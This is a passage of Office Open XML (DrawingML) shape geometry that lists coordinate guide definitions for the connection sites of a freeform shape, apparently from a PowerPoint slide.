              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 500327 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 464645 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 295610 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 99441 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 40805 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 321428 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY134" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY135" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY136" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY137" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY138" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
